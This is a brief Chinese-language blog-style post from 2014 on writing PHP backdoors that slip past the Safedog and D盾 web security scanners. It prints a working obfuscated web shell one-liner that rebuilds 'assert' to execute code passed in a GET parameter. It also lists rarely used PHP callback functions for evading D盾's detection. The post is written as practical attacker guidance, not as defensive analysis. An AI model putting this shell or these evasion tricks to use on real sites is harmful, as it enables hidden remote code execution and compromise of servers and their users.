过狗过D盾PHP后门【2014-11-25】
闲蛋疼研究了下。过狗:(安全狗查杀其实很渣,真的很渣!)
安全狗的木马扫描无非就是特征码,甚至连个简单的后门:
$b = @str_replace("x","","axsxxsxexrxxt");$b($_GET['p']);
都查不出来。关于安全狗更多考虑的应该是主动防御绕过,不过不在此文探讨范围内。
过D盾:
一般般,用些生僻的函数就能绕过。
譬如:array_diff_ukey、array_reduce、array_filter、array_walk、array_udiff_assoc等之类的函数。D盾默认禁用了一些命令执行函数,还是有个"assert"可用。
